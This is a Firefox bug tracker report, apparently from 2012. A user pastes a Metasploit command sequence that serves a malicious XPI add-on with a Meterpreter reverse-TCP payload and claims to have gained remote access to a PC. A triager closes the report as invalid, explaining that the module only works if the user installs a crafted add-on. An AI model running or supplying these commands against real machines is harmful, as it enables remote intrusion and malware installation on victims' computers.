Created attachment 657948
a.png

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Build ID: 20120824154833

Steps to reproduce:

Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox.

Code:
msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf>set payload windows/meterpreter/reverse_tcp
msf>set lport 81
msf> set lhost 0.0.0.0
msf> set srvhost yourip
msf> show targets

Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Linux x86 (Native Payload)
3 Mac OS X PPC (Native Payload)
4 Mac OS X x86 (Native Payload)

msf> set target 1
msf > exploit

Actual results:

I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions.

Expected results:

The exploit shouldn't have existed in the first place.
This is not security sensitive. This is a module that creates a malicious XPI that is an attempt to get the user to install a crafted add-on. Since add-ons can have chrome privileges, they can do just about anything.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID